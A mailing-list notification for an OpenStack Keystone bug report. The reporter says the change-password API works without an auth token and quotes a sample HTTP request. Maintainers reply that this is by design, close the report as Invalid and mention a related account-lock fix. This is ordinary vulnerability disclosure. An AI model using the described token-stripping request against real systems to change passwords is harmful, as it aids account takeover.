This is by design. The change user password API does not require a token, mostly due to a user requiring an administrator to reset their password if it expires since they cannot authenticate for a token.
If an attacker gets a username and password, having a token required to change a password won't really provide any additional security here, they can already login/authenticate as that user. That pci-dss bug has a change in flight to no longer expose the accountlocked exception to users, which should prevent the username oracle issue. ** Information type changed from Private Security to Public ** Changed in: keystone Status: New => Invalid -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1901902 Title: Authtoken not used when changing password through CLI Status in OpenStack Identity (keystone): Invalid Bug description: There is no valid X-Auth-Token needed when changing the password of a user. The authentication only depends on ID and original password: POST /identity/v3/users/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/password HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: python-keystoneclient Content-Length: 76 {"user": {"password": "Password1234!", "original_password": "Password123!"}} The CLI adds an X-Auth-Token, but when removing it, for example using a proxy, the request is successfully processed. Even though this doesn't pose any direct risk (since the ID and original password still have to be known by the attacker), this unnecessarily increases the attack surface and doesn't feel like an intended situation. Combined with some of the issues reported in: https://bugs.launchpad.net/keystone/+bug/1688137 the risk of this issue increases. To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1901902/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp